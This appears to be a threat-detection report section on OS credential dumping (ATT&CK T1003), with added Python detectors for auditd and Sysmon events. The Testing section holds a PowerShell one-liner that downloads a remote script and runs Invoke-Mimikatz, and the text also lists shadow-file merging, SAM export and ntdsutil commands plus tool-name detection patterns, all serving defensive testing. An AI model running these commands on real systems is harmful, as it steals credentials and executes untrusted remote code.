T1003

OS Credential Dumping

Adversaries employ OS Credential Dumping to acquire account credentials that they can subsequently leverage for lateral movement and unauthorized access to restricted information.

Overall rank: #7

Customers affected: 2.7%

Threats detected: 331

Analysis

Why do adversaries dump credentials?

Rooted in the common need for adversaries to infiltrate user accounts and other resources within target organizations, the OS Credential Dumping technique encompasses various methods employed by adversaries and professional penetration testers to acquire valid usernames and passwords. While there are alternative methods of access that do not necessitate legitimate user credentials—such as vulnerability exploitation—possessing a functional username and password remains one of the most effective and reliable tools for discreetly gaining access to a system of interest.

Beyond the immediate objectives of dumping credentials for sale or using them for initial access, the acquired credentials play a pivotal role in the post-exploitation phase. Credential dumping is a crucial enabler of initial access, lateral movement, and privilege escalation within a targeted environment. The prevalence of this technique is driven by the adversary's basic need for credentials, which in turn grant access to systems, minimize detectability, and open avenues for creating additional accounts. Once an adversary has secured initial access to an environment, some level of privileged access is usually needed to achieve further objectives in a campaign. The credentials obtained may take the form of hashed values or clear-text passwords; either way, holding valid credentials streamlines the rest of the intrusion and raises the likelihood of successfully navigating and exploiting the targeted environment.

How do adversaries dump credentials?

Note: OS Credential Dumping makes the top 10 this year as a parent technique due in large part to custom detection analytics that don’t cleanly align with any of its more narrowly scoped sub-techniques. We will discuss the adversary behaviors those analytics detect, but we will also touch on oft-abused sub-techniques as well.

Many effective credential theft tools (e.g., L0phtCrack and gsecdump) are available to adversaries who seek to dump credentials. Mimikatz, which ranked third among detected threats in 2023, is a major contributor to the prominence of credential dumping among threat detections in the environments we monitor, and you can read an in-depth analysis of it in the Threats section of this report.

Some OS Credential Dumping sub-techniques we commonly observe and detect are:

T1003.008: /etc/passwd and /etc/shadow: Adversaries dumping the contents of /etc/passwd and /etc/shadow to enable offline password cracking

In today’s Linux operating systems, you’ll typically find user account information, including password hashes, stored in a tandem of /etc/passwd and /etc/shadow files. Notably, the /etc/shadow file, where the actual password hashes reside, is set to be readable exclusively by the root user by default.

A Linux utility called unshadow offers a way to streamline the process for password cracking. It merges information from /etc/passwd and /etc/shadow into a format tailor-made for password-cracking tools like John the Ripper. Here’s a quick command example to illustrate how it works:

# /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db

This command efficiently combines the pertinent data into a file named crack.password.db in the /tmp directory, setting the stage for potential password cracking endeavors.

 

T1003.001: LSASS Memory: PowerShell and other processes (e.g., Windows Task Manager and Sysinternals ProcDump) accessing and dumping memory from the Local Security Authority Subsystem Service (lsass.exe)

Once a user logs in, the system initiates the creation of credential materials, neatly storing them in the memory of the LSASS process. These credentials, accessible to an admin-level user or SYSTEM, are used for lateral movement.

Note: LSASS Memory didn’t quite make the top 10 this year, but our analysis from last year’s Threat Detection Report remains as relevant as ever.

 

T1003.003: NTDS: NTDSUtil dumping ntds.dit (Active Directory)

When adversaries engage in malicious activities, they strategically target the Active Directory domain database to compromise sensitive information, including credentials, and to extract comprehensive details regarding domain entities such as devices, users, and access privileges.

Notably, the NTDS file (NTDS.dit) assumes a central role in this context. It is typically located within %SystemRoot%\NTDS\Ntds.dit on the designated domain controller.

In the realm of tools and techniques employed for extracting information from the NTDS file and comprehensively assessing the Active Directory hash repository, the following are noteworthy:

 

T1003.007: Proc Filesystem: Gathering credentials from the proc filesystem or /proc

The proc filesystem acts as a sort of virtual window into the inner workings of the Linux kernel, especially when it comes to managing virtual memory. If an adversary has root privileges, they can delve into these memory locations to scour all processes on a system for patterns that might hint at credentials. This could involve searching for specific strings in memory structures or hunting for cached hashes. Even if the adversary doesn’t have elevated access, processes can reveal their own virtual memory locations.

 

T1003.006: DCSync: Gathering password data from Active Directory

This sub-technique comprises abuse of the Windows Domain Controller’s API to simulate the replication process from a remote domain controller using DCSync. Members of the administrators, domain admins, and enterprise admin groups or computer accounts on the domain controller can run DCSync to pull password data from Active Directory. These may include current and historical hashes of potentially useful accounts. DCSync functionality has been included in the lsadump module within Mimikatz.

 

T1003.005: Cached domain credentials: Accessing cached credentials

Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.

 

Other notable techniques we’ve seen

  • Active Directory Explorer (AD Explorer) taking snapshots of Active Directory
  • Windows Registry Console Tool (reg.exe) exporting Windows Registry hives containing credentials
  • Windows Credential Editor dumping NT Lan Manager (NTLM) hashes

Visibility

Note: The visibility sections in this report are mapped to MITRE ATT&CK data sources and components.

Process monitoring

Process monitoring is a data source that security teams should collect from if they want to observe OS Credential Dumping involving tools such as Mimikatz, Empire, L0phtCrack, and gsecdump. One quick and reliable way to observe and potentially detect credential harvesting is to monitor processes for known malicious binaries in combination with LSASS injection. Understanding the processes or programs in an environment that require access to LSASS will make this approach more effective.

Command monitoring

Monitoring process command-line parameters for known malicious CLI syntax may take some research and testing, but it's also a reliable way to observe and/or detect credential harvesting activity emanating from tools such as Mimikatz and Empire. For this data source to be used effectively, the command-line patterns must be specific rather than overly general (i.e., do not match on a single command option alone).

File monitoring

Files are another potentially rich source of telemetry for credential dumping activity, particularly on Linux systems, like the /etc/passwd, /etc/shadow, and proc filesystem tradecraft described earlier, or for any Windows techniques that generate file dumps (e.g., LSASS memory).

Collection

Note: The collection sections of this report showcase specific log sources from Windows events, Sysmon, and elsewhere that you can use to collect relevant security information.

Endpoint detection and response (EDR) products

Most commercial EDR products provide detailed visibility into all of the data sources referenced above and offer great value to security teams seeking to detect credential dumping.

Windows Security Event Log 4688: A new process has been created

Event Log 4688 provides visibility into process start events when command-line logging is enabled, which helps defenders develop detections for, or at least visibility into, any OS Credential Dumping tradecraft that involves processes and their corresponding commands.

Sysmon Event ID 1: Process creation

Like Event Log 4688, Sysmon Event ID 1: Process Creation captures process starts, including command lines, and offers visibility into credential dumping that leverages processes.

Sysmon Event ID 10: ProcessAccess

Sysmon ProcessAccess events log whenever one process attempts to access another. As we’ve discussed, LSASS abuse often involves a process accessing LSASS to dump its memory contents.

Sysmon Event ID 11: FileCreate

File creation events are a useful source of telemetry if you want to keep an eye on adversaries dumping the memory of LSASS to disk or otherwise creating credential dump files.

Auditd

auditd can provide visibility into credential dumping on Linux systems but can be prone to generating high volumes of noise. Monitoring reads of /etc/passwd can be especially noisy, since that file is intended for anyone to read. However, a smaller set of processes is expected to write to it (e.g., visudo), and you may want to monitor processes from certain directories attempting reads of /etc/shadow: namely, processes in /bin/ and /sbin/ are more likely to be the ones legitimately reading the shadow file.
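The heuristics in the paragraph above (expected readers of the shadow file live in /bin/ or /sbin/, most other processes have no business opening it) can be turned into a small correlation over auditd output. The following Python example is added here and is not Red Canary's code. The audit records are constructed; the watch rule shown in the comment is the standard auditctl syntax for a file watch; and the inclusion of /usr/bin and /usr/sbin for merged-/usr distributions, the list of known dumping tools (taken from names the report mentions), and the treatment of denied opens as worth a look are all assumptions of the example.

```python
"""Added example (not from the report): correlate auditd SYSCALL and PATH
records for opens of /etc/shadow and flag the ones the report's heuristics
consider suspicious: the reading executable lives outside the expected
directories, or its name is a known credential-theft tool."""
import re

# Constructed auditd output, as produced by a watch rule such as
#   -w /etc/shadow -p r -k shadow-access
# Timestamps, pids and inodes are made up; unrelated fields were dropped.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000000.101:501): arch=c000003e syscall=257 success=yes exit=3 pid=1234 auid=1000 uid=0 comm="passwd" exe="/usr/bin/passwd" key="shadow-access"
type=PATH msg=audit(1700000000.101:501): item=0 name="/etc/shadow" inode=123 mode=0100640 ouid=0 ogid=42 nametype=NORMAL
type=SYSCALL msg=audit(1700000000.202:502): arch=c000003e syscall=257 success=yes exit=4 pid=1300 auid=1000 uid=0 comm="collect" exe="/tmp/collect" key="shadow-access"
type=PATH msg=audit(1700000000.202:502): item=0 name="/etc/shadow" inode=123 mode=0100640 ouid=0 ogid=42 nametype=NORMAL
type=SYSCALL msg=audit(1700000000.303:503): arch=c000003e syscall=257 success=yes exit=3 pid=1400 auid=1000 uid=0 comm="unshadow" exe="/usr/bin/unshadow" key="shadow-access"
type=PATH msg=audit(1700000000.303:503): item=0 name="/etc/shadow" inode=123 mode=0100640 ouid=0 ogid=42 nametype=NORMAL
type=SYSCALL msg=audit(1700000000.404:504): arch=c000003e syscall=257 success=no exit=-13 pid=1500 auid=1001 uid=1001 comm="cat" exe="/usr/bin/cat" key="shadow-access"
type=PATH msg=audit(1700000000.404:504): item=0 name="/etc/shadow" inode=123 mode=0100640 ouid=0 ogid=42 nametype=NORMAL
"""

# Directories the report names as the likely legitimate readers; /usr/bin and
# /usr/sbin are added as an assumption for merged-/usr distributions, where
# auditd reports the resolved executable path.
EXPECTED_READER_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/")
# Credential-theft helpers named in the report (lower-case basenames).
KNOWN_DUMPING_TOOLS = {"unshadow", "mimikatz", "gsecdump"}

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
SERIAL_RE = re.compile(r"audit\([\d.]+:(\d+)\)")


def parse_record(line):
    """Turn one auditd line into a dict of field -> unquoted value."""
    fields = {k: v.strip('"') for k, v in FIELD_RE.findall(line)}
    m = SERIAL_RE.search(fields.get("msg", ""))
    fields["serial"] = m.group(1) if m else None
    return fields


def correlate(log_text):
    """Group SYSCALL and PATH records by audit serial number."""
    events = {}
    for line in log_text.splitlines():
        rec = parse_record(line)
        ev = events.setdefault(rec["serial"], {"paths": []})
        if rec.get("type") == "SYSCALL":
            ev["syscall"] = rec
        elif rec.get("type") == "PATH":
            ev["paths"].append(rec.get("name", ""))
    return events


def find_suspicious_shadow_access(log_text, watched="/etc/shadow"):
    """Return (serial, exe, reason) for opens of the shadow file worth a look."""
    findings = []
    for serial, ev in sorted(correlate(log_text).items(), key=lambda kv: kv[0] or ""):
        sc = ev.get("syscall")
        if not sc or watched not in ev["paths"]:
            continue
        exe = sc.get("exe", "")
        name = exe.rsplit("/", 1)[-1].lower()
        if name in KNOWN_DUMPING_TOOLS:
            findings.append((serial, exe, "known credential-theft tool"))
        elif not exe.startswith(EXPECTED_READER_DIRS):
            findings.append((serial, exe, "reader outside expected directories"))
        elif sc.get("success") == "no":
            # A denied open by a non-root user is rarely noise worth dropping.
            findings.append((serial, exe, "denied read by uid " + sc.get("uid", "?")))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_shadow_access(SAMPLE_AUDIT_LOG):
        print(*finding)
```

On the constructed log the routine reports the /tmp reader, the unshadow run (which the directory heuristic alone would have passed, since it lives under /usr/bin) and the denied read, while the legitimate passwd invocation is left alone. The ordering of the checks matters: a known tool name wins over its location, so a well-placed binary does not launder itself.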

Note: See the LSASS Memory page from the 2023 Threat Detection Report for specific guidance on that technique.

Detection opportunities

 

If you’re interested in generating reliable detection coverage for credential dumping activity, you’ll want to consider monitoring for the following general behaviors:

  • unknown or known malicious processes injecting into LSASS
  • network connections to a domain controller from unusual IP addresses associated with non-standard or known compromised user accounts
  • reg.exe usage with command-line reg save hklm\sam
  • the binary mimikatz.exe or references to Mimikatz arguments in the CLI
  • use of ntdsutil ifm
  • Impacket being executed for credential dumping, which would include the specified Python module, target IP, and target domain/user in the command line
  • accounts accessing ShadowHashData or the plist file (shadow file)
  • Windows binaries loading the vaultcli.dll and/or the samlib.dll

 

SecretsDump file modification

Impacket’s SecretsDump utility consistently involves the Windows Service Host (svchost.exe) writing randomly named .tmp files to the System32 directory. The following pseudo-detector should offer defenders a reliable method of detecting Impacket’s SecretsDump utility:

process == ('svchost.exe')
&&
module_load == ('regsvc.dll')
&&
file_path == ('windows\system32')
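As an added example (not code from the report or from Red Canary), the following Python sketch runs the behaviors from the detection opportunities list above and the SecretsDump pseudo-detector over a handful of constructed Sysmon-style events (process creation, process access, image load and file create). Event field names, paths, PIDs, command lines and the LSASS-access allowlist are assumptions made for the example; what it shows is the shape of each check: command-line pattern matching for reg save hklm\sam, ntdsutil ifm and Mimikatz references, LSASS handle opens from processes that are not baselined in your environment, and a per-process correlation of a regsvc.dll load with a .tmp write under System32.

```python
"""Added example (not Red Canary's code): toy detectors for the behaviors in
the report's detection-opportunities list and for its SecretsDump
pseudo-detector, run over constructed Sysmon-style events."""
import re

# Constructed sample events, loosely modelled on Sysmon fields: EID 1 process
# creation, EID 10 process access, EID 7 image load, EID 11 file create.
# Every path, PID and command line here is made up for the example.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 100, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save hklm\sam C:\Users\Public\sam.hiv"},
    {"id": 1, "pid": 101, "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": r'ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q'},
    {"id": 1, "pid": 102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe IEX (New-Object Net.WebClient).DownloadString("
                "'http://example.invalid/x'); Invoke-Mimikatz -DumpCr"},
    {"id": 1, "pid": 103, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query hklm\software\microsoft"},          # benign reg.exe use
    {"id": 10, "pid": 200, "source_image": r"C:\Tools\procdump64.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "access": "0x1FFFFF"},
    {"id": 10, "pid": 201, "source_image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "access": "0x1010"},
    {"id": 7, "pid": 300, "image": r"C:\Windows\System32\svchost.exe",
     "loaded": r"C:\Windows\System32\regsvc.dll"},
    {"id": 11, "pid": 300, "image": r"C:\Windows\System32\svchost.exe",
     "target_file": r"C:\Windows\System32\xkqzvwab.tmp"},
    {"id": 7, "pid": 301, "image": r"C:\Windows\System32\svchost.exe",
     "loaded": r"C:\Windows\System32\regsvc.dll"},            # regsvc.dll load, no .tmp write
]

# Command-line patterns taken from the report's detection opportunities list.
COMMAND_LINE_RULES = {
    "reg_save_sam": re.compile(r"\breg(\.exe)?\b.*\bsave\b.*\bhklm\\sam\b", re.I),
    "ntdsutil_ifm": re.compile(r"\bntdsutil(\.exe)?\b.*\bifm\b", re.I),
    "mimikatz_reference": re.compile(r"mimikatz|lsadump::", re.I),
}

# Processes known in *this example* to legitimately open LSASS. This list is an
# assumption for illustration; build yours from your own environment's baseline.
LSASS_ACCESS_ALLOWLIST = {"msmpeng.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_command_lines(events):
    """EID 1 / Security 4688: match command lines against known dumping syntax."""
    hits = []
    for e in events:
        if e.get("id") != 1:
            continue
        for name, rx in COMMAND_LINE_RULES.items():
            if rx.search(e["cmdline"]):
                hits.append((name, e["pid"]))
    return hits


def detect_lsass_access(events):
    """EID 10: any process outside the allowlist opening a handle to lsass.exe."""
    return [
        (basename(e["source_image"]), e["pid"]) for e in events
        if e.get("id") == 10
        and basename(e["target_image"]) == "lsass.exe"
        and basename(e["source_image"]) not in LSASS_ACCESS_ALLOWLIST
    ]


def detect_secretsdump(events):
    """The report's pseudo-detector: an svchost.exe that loads regsvc.dll AND
    writes a .tmp file under the System32 directory, correlated per PID."""
    loaded_regsvc, wrote_tmp = set(), set()
    for e in events:
        if basename(e.get("image", "")) != "svchost.exe":
            continue
        if e["id"] == 7 and basename(e["loaded"]) == "regsvc.dll":
            loaded_regsvc.add(e["pid"])
        elif e["id"] == 11:
            path = e["target_file"].lower()
            if "\\windows\\system32\\" in path and path.endswith(".tmp"):
                wrote_tmp.add(e["pid"])
    return sorted(loaded_regsvc & wrote_tmp)


if __name__ == "__main__":
    print(detect_command_lines(SAMPLE_EVENTS))
    print(detect_lsass_access(SAMPLE_EVENTS))
    print(detect_secretsdump(SAMPLE_EVENTS))
```

Running the script prints the three hit lists: the reg save, ntdsutil ifm and Invoke-Mimikatz command lines, the LSASS handle opened by the non-baselined process, and the single svchost PID that both loaded regsvc.dll and wrote a .tmp file, while the regsvc.dll load with no matching write stays quiet. The allowlist on LSASS access is the mechanism behind the false-positive discussion under Weeding out false positives: the detection is the deviation from what normally touches LSASS in your environment, not a fixed list of tool names.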

Weeding out false positives

Many of the techniques and tools used for administrative purposes can also be used for malicious credential dumping activity. As such, monitoring of processes without CLI and/or context can lead to a large number of false positives, particularly with processes such as:

  • adfind.exe
  • taskmgr.exe
  • ntdsutil.exe
  • reg.exe
  • vssadmin.exe
  • powershell.exe
  • adexplorer.exe

Testing

Start testing your defenses against OS Credential Dumping using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.

Getting started

View atomic tests for T1003: Credential Dumping. 

In most environments, these should be sufficient to generate a useful signal for defenders.

Run this test on a Windows system using PowerShell:

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1tCrad1e'); Invoke-Mimikatz -DumpCr"

Useful telemetry will include:

Visibility: Process monitoring
Telemetry: powershell.exe
Collection: EDR, Windows Security Event Logs, and Sysmon should record this process start.

Visibility: Command monitoring
Telemetry: "DownloadString", "WebClient", and Invoke-Mimikatz
Collection: EDR, Windows Security Event Logs, and Sysmon should record this process start.

 

Review and repeat

Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:

  • Were any of your actions detected?
  • Were any of your actions blocked or prevented?
  • Were your actions visible in logs or other defensive telemetry?

Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.
